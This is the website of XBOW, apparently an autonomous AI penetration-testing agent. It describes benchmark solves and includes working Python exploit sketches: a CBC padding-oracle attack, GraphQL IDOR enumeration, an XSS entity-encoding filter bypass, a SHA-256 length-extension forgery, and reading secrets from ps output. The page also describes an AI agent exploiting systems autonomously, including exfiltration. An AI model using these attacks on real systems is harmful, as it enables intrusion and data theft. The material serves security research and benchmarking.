
Boosting offensive security with AI
XBOW autonomously finds and exploits vulnerabilities in 75% of web benchmarks
PortSwigger Labs
PentesterLab Exercises
Novel Benchmarks
See XBOW at work
XBOW pursues high-level goals by executing commands and reviewing their output, without any human intervention.
These are real examples of XBOW solving benchmarks. The only guidance provided to XBOW, aside from general instructions that are identical for every task, is the benchmark description. If you'd like to see all the data, click here.
Breaking a Cryptographic CAPTCHA with a CBC Padding Oracle
Don't roll your own crypto—or XBOW might break it. This trace shows XBOW pulling off a classic Padding Oracle attack on an AES-CBC implementation in the novel XBOW benchmark "Bad Captcha". By manipulating the authentication cookie used by the app, XBOW is able to decrypt the secret one byte at a time and use it to register a new user.
- XBOW begins by verifying the presence of the CAPTCHA cookie and understanding its structure, guessing from the size (256-bit) that it may use AES
- XBOW then starts implementing an attack to decrypt the cookie, refining its code and debugging issues it encounters
- One of its attempts reveals that the server responds with `Invalid padding` rather than `Invalid CAPTCHA` in some cases, a crucial feature of a padding oracle vulnerability
- After noticing that some cookie values trigger a `500 Internal Server Error`, XBOW explores possible non-cryptographic attacks like SSTI
- XBOW decides to execute a full CBC padding attack, and successfully decrypts the CAPTCHA cookie, but is unable to modify it to bypass authentication
- It realizes that the attack needs to target the CAPTCHA input (rather than modifying the cookie), and uses the decrypted cookie to create a new user and obtain the flag
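The decryption step can be sketched in Python. This is a minimal, self-contained illustration of a CBC padding oracle attack, not XBOW's actual code. A toy Feistel cipher built on SHA-256 stands in for AES so that the example needs only the standard library, and `padding_oracle` plays the role of the server's `Invalid padding` response. All function names and the sample secret are assumptions made for illustration.

```python
import hashlib
import os

BLOCK = 16  # block size in bytes, same as AES

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    # Round function of the toy Feistel cipher (a stand-in for AES, not secure).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]

def encrypt_block(key, block):
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right

def decrypt_block(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right

def cbc_encrypt(key, plaintext):
    pad_len = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes([pad_len]) * pad_len  # PKCS#7 padding
    prev = os.urandom(BLOCK)  # random IV, sent as the first block
    out = [prev]
    for i in range(0, len(padded), BLOCK):
        prev = encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def padding_oracle(key, data):
    # Server side: reveals only whether the decrypted padding is valid.
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    plain = b"".join(_xor(decrypt_block(key, c), p) for p, c in zip(blocks, blocks[1:]))
    n = plain[-1]
    return 1 <= n <= BLOCK and plain.endswith(bytes([n]) * n)

def recover_block(oracle, prev, block):
    # Attacker side: learn the block's plaintext one byte at a time, last byte first.
    inter = bytearray(BLOCK)  # block-cipher output before the CBC XOR
    for pos in range(BLOCK - 1, -1, -1):
        pad_len = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad_len  # force known bytes to pad_len
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + block):
                continue
            if pos == BLOCK - 1:
                # Rule out accidental longer paddings such as 02 02.
                forged[pos - 1] ^= 0xFF
                still_valid = oracle(bytes(forged) + block)
                forged[pos - 1] ^= 0xFF
                if not still_valid:
                    continue
            inter[pos] = guess ^ pad_len
            break
        else:
            raise ValueError("oracle never accepted a guess")
    return _xor(inter, prev)

def attack(oracle, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(recover_block(oracle, p, c) for p, c in zip(blocks, blocks[1:]))
    return plain[:-plain[-1]]  # strip the padding

key = os.urandom(16)           # known only to the simulated server
secret = b"CAPTCHA=7XK2QP9"    # hypothetical cookie contents
cookie = cbc_encrypt(key, secret)
recovered = attack(lambda data: padding_oracle(key, data), cookie)
print(recovered)
```

The attacker code never touches `key`. It only asks the oracle yes/no questions, which is why distinguishing a padding error from any other error is enough to decrypt the cookie.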
Exploiting Insecure Direct Object Reference (IDOR) in a GraphQL API
Even when we entirely removed the benchmark description provided by its author, XBOW still solved this novel benchmark. From nothing but a login page, it guesses a valid username and password, analyzes the code of the prescription management app, and uses GraphQL introspection queries to view the prescriptions of all users on the site—finding one that holds the flag.
- After basic reconnaissance on the login page, XBOW guesses likely usernames and passwords and gains authenticated access
- Once inside, it scans for likely endpoints, and finds two interesting targets: `/add_prescription` and `/view_prescriptions`
- It turns its attention to analyzing the client-side JavaScript, and finds a `/graphql` endpoint that includes a `flag` field
- XBOW uses GraphQL introspection to understand the API schema, discovering a `getPrescriptions` query type; from the presence of a `userId` parameter it surmises that the app may be vulnerable to Insecure Direct Object Reference (IDOR)
- With this knowledge, it enumerates the prescriptions for other user IDs, exploiting the IDOR vulnerability and capturing the flag
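The enumeration step can be illustrated with a short Python sketch. It is not taken from the trace. The names `getPrescriptions`, `userId`, and `flag` come from the description above, while the `Int!` type, the `id` field, the sample data, and the in-memory `fake_graphql_server` are assumptions that stand in for the real application.

```python
import json

# Query shape is an assumption; only getPrescriptions, userId and flag are from the text.
QUERY = "query ($userId: Int!) { getPrescriptions(userId: $userId) { id flag } }"

def build_request(user_id):
    # Standard GraphQL-over-HTTP JSON body: a query plus its variables.
    return json.dumps({"query": QUERY, "variables": {"userId": user_id}})

# Hypothetical data for the stand-in server.
_FAKE_DB = {
    1: [{"id": 10, "flag": None}],
    2: [{"id": 20, "flag": "FLAG{example}"}],
}

def fake_graphql_server(body, session_user_id):
    variables = json.loads(body)["variables"]
    # The IDOR: the resolver trusts the client-supplied userId and never
    # compares it with session_user_id.
    rows = _FAKE_DB.get(variables["userId"], [])
    return json.dumps({"data": {"getPrescriptions": rows}})

def enumerate_prescriptions(send, user_ids):
    # Ask for every candidate user ID and keep any rows that carry a flag.
    found = {}
    for uid in user_ids:
        reply = json.loads(send(build_request(uid)))
        rows = reply.get("data", {}).get("getPrescriptions") or []
        flags = [row["flag"] for row in rows if row.get("flag")]
        if flags:
            found[uid] = flags
    return found

# Logged in as user 1, yet able to read user 2's records.
hits = enumerate_prescriptions(
    lambda body: fake_graphql_server(body, session_user_id=1),
    range(1, 5),
)
print(hits)
```

A fix on the server side would compare the requested `userId` with the authenticated session before returning any rows.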
Debugging, Testing, and Refining a Jenkins Remote Code Execution Exploit
After a benchmark bug made this "Medium" difficulty PentesterLab exercise much more difficult than intended, XBOW beats the odds by debugging not only its own code but the compromised server as well. Its final solution—a Python program that exploits XML deserialization to deploy an embedded bash script, stealing secrets from running processes' command lines—is a thing of beauty.
- XBOW checks for public exploits using `searchsploit`, but ultimately opts to write its own code to exploit the issue
- When its initial attempts don't succeed, XBOW shows heroic perseverance in the face of very long Java stack traces, using the server's error messages to identify and fix issues
- After extensive debugging, XBOW determines the correct format expected by the server, and successfully submits a malicious job that will run `/usr/local/bin/exfiltrate` on the server to exfiltrate the flag, but does not receive the flag due to a missing environment variable in the benchmark setup
- Undeterred, XBOW uses its newfound ability to remotely execute code to debug the server environment itself
- By launching the exfiltration binary in the background and monitoring activity on the server, it spots the flag in the output of `ps`, allowing it to solve the benchmark
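The final step relies on a general property of Unix-like systems: the arguments of a running process are visible to other processes through `ps`. The Python sketch below illustrates only that property and has nothing Jenkins-specific in it. The helper names, the `--secret` argument, and the fallback to `/proc` when `ps` is unavailable are assumptions made for illustration.

```python
import shutil
import subprocess
import sys
import time
from pathlib import Path

def command_line_of(pid):
    # Prefer ps, as in the trace; fall back to /proc on systems without a usable ps.
    if shutil.which("ps"):
        result = subprocess.run(
            ["ps", "-ww", "-p", str(pid), "-o", "args="],
            capture_output=True, text=True, check=False,
        )
        if result.returncode == 0 and result.stdout.strip():
            return result.stdout.strip()
    raw = Path(f"/proc/{pid}/cmdline").read_bytes()
    return raw.replace(b"\0", b" ").decode(errors="replace").strip()

def observe_background_process(argv, settle=0.2):
    # Start the program in the background, then inspect it from the outside.
    proc = subprocess.Popen(argv)
    try:
        time.sleep(settle)
        return command_line_of(proc.pid)
    finally:
        proc.kill()
        proc.wait()

# A stand-in for a binary that receives a secret as a command-line argument.
seen = observe_background_process(
    [sys.executable, "-c", "import time; time.sleep(5)", "--secret=FLAG{example}"]
)
print(seen)
```

This is why secrets are usually passed through files or inherited descriptors rather than command-line arguments.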
Bypassing Filters and Exploiting Complex Cross-Site Scripting (XSS)
In this novel XBOW benchmark, XBOW detects one of the OWASP Top 10 most common vulnerabilities: Cross-Site Scripting (XSS). By hacking its way through a thicket of security filters, XBOW is able to find a bypass and exploit the XSS by using HTML entity encoding.
- XBOW starts analyzing the application, examining the HTML of the main page and identifying an `/xss20` endpoint
- Based on the benchmark description, XBOW looks for potential XSS vulnerabilities and identifies a vulnerable parameter `name`
- It detects that multiple characters are filtered by the application, making it difficult to craft a valid payload. XBOW tries to circumvent the protection with URL-encoded characters to bypass server-side filtering
- XBOW realizes that the XSS filter appears to be checking for specific characters rather than using a comprehensive sanitization approach
- After systematically attempting different techniques, XBOW decides to try HTML entity encoding and successfully bypasses the filter to complete the benchmark
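Why a character blocklist fails against entity encoding can be shown in a few lines of Python. This is a sketch under stated assumptions: the blocked character set and the payload are hypothetical (the benchmark's real filter is not described here), and `html.unescape` stands in for the decoding a browser applies to attribute values before the script runs.

```python
import html

# Hypothetical blocklist; the benchmark's actual filter rules are not given.
BLOCKED = set("()'`")

def naive_filter(value):
    # Accepts the input only if none of the blocked characters appear literally.
    return not any(ch in BLOCKED for ch in value)

def entity_encode(text, chars):
    # Replace each listed character with its numeric HTML entity, e.g. "(" -> "&#40;".
    return "".join(f"&#{ord(c)};" if c in chars else c for c in text)

raw = "alert('XSS')"
encoded = entity_encode(raw, BLOCKED)

print(naive_filter(raw))      # the literal payload is rejected
print(naive_filter(encoded))  # the encoded payload passes the filter
print(html.unescape(encoded)) # decoding restores the original payload
```

The filter inspects the raw characters while the browser acts on the decoded ones, so checking for specific characters is not a substitute for context-aware output encoding.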
Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack
To solve this PentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOW writes its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature using a hash extension attack—all without access to the tutorial given to human solvers.
- XBOW first fetches the provided Ruby source code for the app, and learns from reading it that the app's `/getfile` endpoint can be used to read arbitrary files, but only if accompanied by a valid SHA-256 signature
- Recognizing that it needs to execute a hash extension attack, XBOW attempts to install `hash_extender`, but finds that it is not available through `apt`
- It also tries to implement the attack using Python's standard `hashlib` library, but finds that its API does not offer sufficient control over the internal SHA-256 state variable it needs to manipulate
- After another unsuccessful attempt to obtain and use a third-party tool, XBOW decides to write its own SHA-256 implementation from scratch
- Its implementation of SHA-256 is correct, but its initial attempts to forge a signature and sign a payload that obtains the flag using directory traversal do not work
- After debugging the issue and hypothesizing that its earlier mistake was due to missing URL encoding, XBOW writes a Python script to retry the attack with a variety of key lengths, and succeeds on its next try
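The reason a custom SHA-256 is needed can be seen in a compact Python sketch. It is an independent illustration, not the code from the trace. It assumes the signature is computed as SHA-256 over the key followed by the message; the key, file name, and traversal suffix are hypothetical. The round constants are derived from their definition rather than typed in, and `hashlib` is used only to play the server and to check the result.

```python
import hashlib
import math
import struct

MASK = 0xFFFFFFFF

def _primes(count):
    found, n = [], 2
    while len(found) < count:
        if all(n % p for p in found):
            found.append(n)
        n += 1
    return found

def _icbrt(n):
    # Integer cube root by binary search.
    lo, hi = 0, 1 << ((n.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        lo, hi = (mid, hi) if mid ** 3 <= n else (lo, mid - 1)
    return lo

# Constants: fractional bits of the square/cube roots of the first primes.
H0 = tuple(math.isqrt(p << 64) & MASK for p in _primes(8))
K = [_icbrt(p << 96) & MASK for p in _primes(64)]

def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK

def compress(state, block):
    w = list(struct.unpack(">16L", block))
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25))
              + ((e & f) ^ (~e & g)) + K[i] + w[i]) & MASK
        t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22))
              + ((a & b) ^ (a & c) ^ (b & c))) & MASK
        a, b, c, d, e, f, g, h = (t1 + t2) & MASK, a, b, c, (d + t1) & MASK, e, f, g
    return [(x + y) & MASK for x, y in zip(state, (a, b, c, d, e, f, g, h))]

def md_padding(total_len):
    # Padding SHA-256 appends to a message of total_len bytes.
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", total_len * 8)

def sha256(data, state=H0, prior_len=0):
    # Unlike hashlib, the starting state and prior length can be injected.
    data += md_padding(prior_len + len(data))
    for i in range(0, len(data), 64):
        state = compress(state, data[i:i + 64])
    return struct.pack(">8L", *state)

def extend(signature_hex, message, suffix, key_len):
    # Resume hashing from the known signature, without knowing the key.
    state = struct.unpack(">8L", bytes.fromhex(signature_hex))
    glue = md_padding(key_len + len(message))
    prior_len = key_len + len(message) + len(glue)
    return message + glue + suffix, sha256(suffix, state, prior_len).hex()

key = b"hypothetical-key"  # known only to the simulated server

def server_accepts(message, signature_hex):
    return hashlib.sha256(key + message).hexdigest() == signature_hex

message = b"report.txt"
signature = hashlib.sha256(key + message).hexdigest()
working_key_len = None
for key_len in range(1, 33):  # the key length is unknown, so try several
    forged_message, forged_sig = extend(signature, message, b"/../../flag", key_len)
    if server_accepts(forged_message, forged_sig):
        working_key_len = key_len
        break
print(working_key_len, forged_message)
```

The forged message contains raw padding bytes, so in a real request it would need to be URL-encoded before being sent, which matches the debugging step described above.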
Team
Security, AI, and Engineering
Nico Waisman
Head of Security
Albert Ziegler
Head of AI
Andrew Rice
Head of Engineering
Aqeel Siddiqui
Head of Product & Customer Success
Jordan McTaggart
Head of Finance & BizOps
Zac Wallis
Head of Talent
Alex Gatzlaff
Account Executive
Alvaro Muñoz
Security Researcher
Brendan Coll
Research Engineer
Brendan Dolan-Gavitt
AI Researcher
Daniel Wagner
Research Engineer
Diego Jurado
Security Researcher
Ewan Mellor
Research Engineer
Fernando Russ
Research Engineer
Ian Campbell
Research Engineer
Javier Gil
Security Researcher
Joanna Clifton
Operations
Joel Noguera
Security Researcher
Johan Rosenkilde
AI Researcher
Leandro Barragan
Security Researcher
Max Schaefer
AI Researcher
Meurig Thomas
Research Engineer
Nicolas Trippar
Security Researcher
Thomas Bolton
AI Researcher
We are recruiting.
Blog
Updates and opinions from the team
July 31, 2025 - By Nico Waisman
The campaign is not available in your country: XBOW discovered an SQLi while attempting to bypass geolocation restrictions.
As much as an AI might get discouraged, it’s also incredibly relentless in its pursuit.
Read post
July 28, 2025 - By Alvaro Muñoz
Another Byte Bites the Dust - How XBOW Turned a Blind SSRF into a File Reading Oracle
A complete arbitrary local file read vulnerability achieved through an ingenious byte-by-byte exfiltration technique.
Read post
July 24, 2025 - By Alvaro Muñoz
Beyond the Bands: Exploiting TiTiler’s Expression Parser for Remote Code Execution
A methodical analysis of TiTiler's API endpoints and its expression parser, leading to arbitrary Python code execution on the server.
Read post
Frequently asked questions
Benchmarks
What do you consider a “benchmark”?
A benchmark is a realistic exercise in web security, with a crisp success criterion like capturing a flag. Many challenges in CTF contests do not qualify because they are brainteasers rather than reflecting a realistic web security scenario.
Where did XBOW get its collection of benchmarks?
XBOW’s benchmarks have been carefully selected for relevance and breadth by its security experts. Sources include leading vendors of training materials, such as PortSwigger and PentesterLab, and public CTF competitions. Some benchmarks have been authored specifically for XBOW, so we can be sure they do not occur in any training sets.
The original PortSwigger labs do not have flags — why do the traces shown for these benchmarks include a flag?
The PortSwigger labs detect automatically whether you have solved the lab or not. However, we wanted all benchmarks to have the same crisp success criterion which can be checked by our infrastructure. So we introduced a flag and a mechanism for returning it.
Could you provide more information about the novel XBOW benchmarks?
XBOW’s security experts designed a set of unique web benchmarks to ensure that solutions were never included in any training data. The benchmarks cover many vulnerability classes and varying degrees of difficulty.
Will the novel XBOW benchmarks be released?
Yes. The novel XBOW benchmarks will be open-sourced soon. We hope others will join us in using these benchmarks to set a new standard for the evaluation of security tools.
How many benchmarks does XBOW have?
XBOW has collected a corpus of thousands of benchmarks, both for evaluating performance and for improving it.
Where can I find more details about the benchmarks that XBOW solved?
We provide more details to back up the results reported on this website. See here for the benchmarks that were attempted, and which were solved.
Technology
How does the AI inside XBOW work?
It is an example of ‘agentic AI’. We use many standard techniques, but also plenty of proprietary innovations. Aside from general guidance that is identical for every task, the only directions given to XBOW are the basic benchmark description.
We are a growing startup and this intellectual property is our main asset, so we cannot share the details.
Are the example traces shown edited?
The AI reasoning and command outputs shown in our example traces have not been edited in any way (e.g., wrapped lines are still present). We have withheld the general guidance (“prompts”) to protect XBOW’s proprietary technology.
Can XBOW find and exploit vulnerabilities without providing descriptions or without having “flags” as a goal?
Yes, we have run experiments by blanking out the descriptions and that works fine. Without flags as a goal, XBOW decides on its own when it has finished. You can prompt it to be more or less aggressive - for example, when it discovers a SQL injection, it can (after approval from a human operator) continue to exfiltrate valuable data from the database, or just stop and report the core problem.
Is XBOW useful for everyone or does it require any sort of specific knowledge?
XBOW is useful for anyone looking to improve the security of their web applications. You don’t need to be a security or AI expert to use it—a lot of deep security knowledge is baked into the XBOW product. This is the magic of our team, combining such security expertise with AI and engineering skills.
Responsible AI
How will you ensure your technology won't be misused?
We will only make our technology available to trusted customers in the cloud. It is not possible to run XBOW as a standalone application outside our control.